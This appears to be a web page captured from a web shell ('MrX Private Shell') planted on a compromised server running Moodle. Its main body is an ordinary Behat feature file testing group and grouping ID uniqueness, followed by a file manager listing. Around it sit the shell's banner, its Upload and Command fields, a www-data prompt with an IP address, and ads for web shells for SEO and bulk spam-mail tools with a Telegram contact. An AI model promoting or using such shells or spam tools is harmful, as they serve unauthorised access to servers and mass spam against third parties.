__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@core @core_group
Feature: Uniqueness of Group ID number
  In order to create unique groups and groupings
  As a teacher
  I need to create groups with unique identificators

  Background:
    Given the following "courses" exist:
      | fullname | shortname | category |
      | Course 1 | C1 | 0 |
    And the following "users" exist:
      | username | firstname | lastname | email |
      | teacher1 | Teacher | 1 | teacher1@example.com |
    And the following "course enrolments" exist:
      | user | course | role |
      | teacher1 | C1 | editingteacher |

  Scenario: Group ID number uniqueness
    Given I am on the "Course 1" "groups" page logged in as "teacher1"
    And I press "Create group"
    And I set the following fields to these values:
      | Group name | Group 1 |
      | Group ID number | G1 |
    And I press "Save changes"
    When I press "Create group"
    And I set the following fields to these values:
      | Group name | Group 2 |
      | Group ID number | G1 |
    And I press "Save changes"
    Then I should see "This ID number is already taken"
    And I set the following fields to these values:
      | Group ID number | G2 |
    And I press "Save changes"
    And I set the field "groups" to "Group 1 (0)"
    And I press "Edit group settings"
    And I set the following fields to these values:
      | Group ID number | G2 |
    And I press "Save changes"
    And I should see "This ID number is already taken"
    And I press "Cancel"

  Scenario: Grouping ID number uniqueness
    Given I am on the "Course 1" "groupings" page logged in as "teacher1"
    And I press "Create grouping"
    And I set the following fields to these values:
      | Grouping name | Grouping 1 |
      | Grouping ID number | GG1 |
    And I press "Save changes"
    When I press "Create grouping"
    And I set the following fields to these values:
      | Grouping name | Grouping 2 |
      | Grouping ID number | GG1 |
    And I press "Save changes"
    Then I should see "This ID number is already taken"
    And I set the following fields to these values:
      | Grouping ID number | GG2 |
    And I press "Save changes"
    And I click on "Edit" "link" in the "Grouping 1" "table_row"
    And I set the following fields to these values:
      | Grouping ID number | GG2 |
    And I press "Save changes"
    And I should see "This ID number is already taken"
    And I press "Cancel"

Filemanager

Name Type Size Permission Actions
auto_creation.feature File 8.52 KB 0777
backup_restore_groups.feature File 2.83 KB 0777
behat_groups.php File 3.66 KB 0777
bulk_messaging.feature File 2.45 KB 0777
create_groups.feature File 6.97 KB 0777
custom_fields.feature File 3 KB 0777
delete_groups.feature File 2.88 KB 0777
group_customfields.feature File 3.35 KB 0777
group_description_picture.feature File 5.84 KB 0777
groups_import.feature File 7.75 KB 0777
id_uniqueness.feature File 2.36 KB 0777
overview.feature File 9.26 KB 0777
private_groups.feature File 11.63 KB 0777
role_visibility.feature File 2.32 KB 0777
update_groups.feature File 7.15 KB 0777
Filemanager